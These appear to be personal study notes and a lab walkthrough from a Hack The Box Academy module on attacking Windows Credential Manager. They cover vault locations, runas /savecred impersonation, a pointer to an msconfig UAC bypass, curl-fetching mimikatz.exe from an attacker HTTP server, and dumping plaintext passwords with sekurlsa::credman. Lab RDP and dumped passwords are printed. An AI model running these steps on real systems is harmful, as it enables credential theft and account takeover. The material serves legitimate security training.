Attacking Windows Credential Manager

Windows Vault and Credential Manager

Credential Manager is a feature built into Windows since Server 2008 R2 and Windows 7. Thorough documentation on how it works is not publicly available, but essentially, it allows users and applications to securely store credentials relevant to other systems and websites. Credentials are stored in special encrypted folders on the computer under the user and system profiles (MITRE ATT&CK):

%UserProfile%\AppData\Local\Microsoft\Vault\
%UserProfile%\AppData\Local\Microsoft\Credentials\
%UserProfile%\AppData\Roaming\Microsoft\Vault\
%ProgramData%\Microsoft\Vault\
%SystemRoot%\System32\config\systemprofile\AppData\Roaming\Microsoft\Vault\

Each vault folder contains a Policy.vpol file with AES keys (AES-128 or AES-256) that is protected by DPAPI. These AES keys are used to encrypt the credentials. Newer versions of Windows make use of Credential Guard to further protect the DPAPI master keys by storing them in secured memory enclaves (Virtualization-based Security).

Microsoft often refers to the protected stores as Credential Lockers (formerly Windows Vaults). Credential Manager is the user-facing feature/API, while the actual encrypted stores are the vault/locker folders. The following table lists the two types of credentials Windows stores:

Name

Description

Web Credentials

Credentials associated with websites and online accounts. This locker is used by Internet Explorer and legacy versions of Microsoft Edge.

Windows Credentials

Used to store login tokens for various services such as OneDrive, and credentials related to domain users, local network resources, services, and shared directories.

It is possible to export Windows Vaults to .crd files either via Control Panel or with the following command. Backups created this way are encrypted with a password supplied by the user, and can be imported on other Windows systems.

C:\Users\sadams>rundll32 keymgr.dll,KRShowKeyMgr

Enumerating credentials with cmdkey

We can use cmdkey to enumerate the credentials stored in the current user's profile:

C:\Users\sadams>whoami
srv01\sadams

C:\Users\sadams>cmdkey /list

Currently stored credentials:

    Target: WindowsLive:target=virtualapp/didlogical
    Type: Generic
    User: 02hejubrtyqjrkfi
    Local machine persistence

    Target: Domain:interactive=SRV01\mcharles
    Type: Domain Password
    User: SRV01\mcharles

Stored credentials are listed with the following format:

Key

Value

Target

The resource or account name the credential is for. This could be a computer, domain name, or a special identifier.

Type

The kind of credential. Common types are Generic for general credentials, and Domain Password for domain user logons.

User

The user account associated with the credential.

Persistence

Some credentials indicate whether a credential is saved persistently on the computer; credentials marked with Local machine persistence survive reboots.

The first credential in the command output above, virtualapp/didlogical, is a generic credential used by Microsoft account/Windows Live services. The random looking username is an internal account ID. This entry may be ignored for our purposes.

The second credential, Domain:interactive=SRV01\mcharles, is a domain credential associated with the user SRV01\mcharles. Interactive means that the credential is used for interactive logon sessions. Whenever we come across this type of credential, we can use runas to impersonate the stored user like so:

C:\Users\sadams>runas /savecred /user:SRV01\mcharles cmd
Attempting to start cmd as user "SRV01\mcharles" ...

Extracting credentials with Mimikatz

There are many different tools that can be used to decrypt stored credentials. One of the tools we can use is mimikatz. Even within mimikatz, there are multiple ways to attack these credentials - we can either dump credentials from memory using the sekurlsa module, or we can manually decrypt credentials using the dpapi module. For this example, we will target the LSASS process with sekurlsa:

C:\Users\Administrator\Desktop> mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::credman

...SNIP...

Authentication Id : 0 ; 630472 (00000000:00099ec8)
Session           : RemoteInteractive from 3
User Name         : mcharles
Domain            : SRV01
Logon Server      : SRV01
Logon Time        : 4/27/2025 2:40:32 AM
SID               : S-1-5-21-1340203682-1669575078-4153855890-1002
        credman :
         [00000000]
         * Username : mcharles@inlanefreight.local
         * Domain   : onedrive.live.com
         * Password : ...SNIP...

...SNIP...

Note: Some other tools which may be used to enumerate and extract stored credentials included SharpDPAPI, LaZagne, and DonPAPI.

What is the password mcharles uses for OneDrive?

Go on our target with rcp :

xfreerdp /u:sadams /p:totally2brow2harmon@ /v:10.129.17.152

Use cmdkey command :

C:\Users\sadams>cmdkey /list

Currently stored credentials:

    Target: Domain:interactive=SRV01\mcharles
    Type: Domain Password
    User: SRV01\mcharles

Run as mcharles user :

C:\Users\sadams>runas /user:SRV01\mcharles /savecred cmd
Attempting to start cmd as user "SRV01\mcharles" ...

C:\Windows\system32>whoami
srv01\mcharles

Depending on how you tackle this exercise, you might have to deal with UAC. If that is the case, one easy solution can be found by looking up the "msconfig UAC bypass".

We makes some searchs about "msconfig UAC bypass". We found this solution with this link : https://medium.com/@irfanbhat3/bypassing-uac-by-gui-based-bypasses-a1a53e8ee8f2

Now, we are administrator. Let's locate mimikatz.exe on our linux to send it on Windows machine :

┌─[eu-academy-3]─[10.10.14.145]─[htb-ac-1811357@htb-gaboqtdofx]─[~]
└──╼ [★]$ locate mimikatz
...SNIP...
/usr/share/windows-resources/mimikatz/x64/mimikatz.exe


┌─[eu-academy-3]─[10.10.14.145]─[htb-ac-1811357@htb-gaboqtdofx]─[~]
└──╼ [★]$ cd /usr/share/windows-resources/mimikatz/x64/

Now, open the python server :

┌─[eu-academy-3]─[10.10.14.145]─[htb-ac-1811357@htb-gaboqtdofx]─[/usr/share/windows-resources/mimikatz/x64]
└──╼ [★]$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...

Get mimikatz.exe via curl on our windows target as admin :

C:\Windows\system32>curl http://10.10.14.145:8080/mimikatz.exe -o C:\Users\Administrator\Desktop\mimikatz.exe
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 1059k  100 1059k    0     0  1650k      0 --:--:-- --:--:-- --:--:-- 1659k

Now, use it to get the mcharles's password :

C:\Windows\system32>cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::credman

Authentication Id : 0 ; 321968 (00000000:0004e9b0)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 1/30/2026 4:23:28 PM
SID               : S-1-5-90-0-2
        credman :

Authentication Id : 0 ; 321944 (00000000:0004e998)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 1/30/2026 4:23:28 PM
SID               : S-1-5-90-0-2
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : SRV01$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 1/30/2026 4:21:34 PM
SID               : S-1-5-20
        credman :

Authentication Id : 0 ; 39326 (00000000:0000999e)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 1/30/2026 4:21:34 PM
SID               : S-1-5-96-0-0
        credman :

Authentication Id : 0 ; 631369 (00000000:0009a249)
Session           : Interactive from 0
User Name         : mcharles
Domain            : SRV01
Logon Server      : SRV01
Logon Time        : 1/30/2026 4:27:33 PM
SID               : S-1-5-21-1340203682-1669575078-4153855890-1002
        credman :

Authentication Id : 0 ; 631337 (00000000:0009a229)
Session           : Interactive from 0
User Name         : mcharles
Domain            : SRV01
Logon Server      : SRV01
Logon Time        : 1/30/2026 4:27:33 PM
SID               : S-1-5-21-1340203682-1669575078-4153855890-1002
        credman :

Authentication Id : 0 ; 345400 (00000000:00054538)
Session           : RemoteInteractive from 2
User Name         : sadams
Domain            : SRV01
Logon Server      : SRV01
Logon Time        : 1/30/2026 4:23:29 PM
SID               : S-1-5-21-1340203682-1669575078-4153855890-1003
        credman :
         [00000000]
         * Username : SRV01\mcharles
         * Domain   : SRV01\mcharles
         * Password : proofs1insight1rustles!

Authentication Id : 0 ; 319959 (00000000:0004e1d7)
Session           : Interactive from 2
User Name         : UMFD-2
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 1/30/2026 4:23:28 PM
SID               : S-1-5-96-0-2
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 1/30/2026 4:21:34 PM
SID               : S-1-5-19
        credman :

Authentication Id : 0 ; 69074 (00000000:00010dd2)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 1/30/2026 4:21:34 PM
SID               : S-1-5-90-0-1
        credman :

Authentication Id : 0 ; 69056 (00000000:00010dc0)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 1/30/2026 4:21:34 PM
SID               : S-1-5-90-0-1
        credman :

Authentication Id : 0 ; 39357 (00000000:000099bd)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 1/30/2026 4:21:34 PM
SID               : S-1-5-96-0-1
        credman :

Authentication Id : 0 ; 38321 (00000000:000095b1)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 1/30/2026 4:21:34 PM
SID               :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : SRV01$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 1/30/2026 4:21:34 PM
SID               : S-1-5-18
        credman :

We can get the password of mcharles :

Authentication Id : 0 ; 345400 (00000000:00054538)
Session           : RemoteInteractive from 2
User Name         : sadams
Domain            : SRV01
Logon Server      : SRV01
Logon Time        : 1/30/2026 4:23:29 PM
SID               : S-1-5-21-1340203682-1669575078-4153855890-1003
        credman :
         [00000000]
         * Username : SRV01\mcharles
         * Domain   : SRV01\mcharles
         * Password : xxxxxxxxxxxxxxxxxxxxxxx

Now, connect with rdp at mcharles :

xfreerdp /u:mcharles /p:xxxxxxxxxxxxxxxxxxxxxxx /v:10.129.17.152

Check the cmdkey list as mcharles :

C:\Users\mcharles>cmdkey /list

Currently stored credentials:

    Target: LegacyGeneric:target=onedrive.live.com
    Type: Generic
    User: mcharles@inlanefreight.local

We can see the onedrive address.

Let's try to get the password of this account. We need to make msconfig UAC bypass again :

And, now, acces to Administrator's Desktop, and use mimikatz to get mcharles's OneDrive credentials :

C:\Windows\system32>cd \Users\Administrator\Desktop


C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 03BC-D3A9

 Directory of C:\Users\Administrator\Desktop

01/30/2026  05:04 PM    <DIR>          .
01/30/2026  05:04 PM    <DIR>          ..
01/30/2026  05:10 PM         1,355,264 mimikatz.exe
               1 File(s)      1,355,264 bytes
               2 Dir(s)   4,569,718,784 bytes free


C:\Users\Administrator\Desktop>mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::credman

Authentication Id : 0 ; 1823784 (00000000:001bd428)
Session           : RemoteInteractive from 3
User Name         : mcharles
Domain            : SRV01
Logon Server      : SRV01
Logon Time        : 1/30/2026 5:18:39 PM
SID               : S-1-5-21-1340203682-1669575078-4153855890-1002
        credman :
         [00000000]
         * Username : mcharles@inlanefreight.local
         * Domain   : onedrive.live.com
         * Password : xxxxxxxxxxxxxxxxxx

...SNIP...

PreviousAttacking LSASS NextAttacking Active Directory and NTDS.dit

Last updated 11 days ago

hashtagWindows Vault and Credential Manager

hashtagEnumerating credentials with cmdkey

hashtagExtracting credentials with Mimikatz

Windows Vault and Credential Manager

Enumerating credentials with cmdkey

Extracting credentials with Mimikatz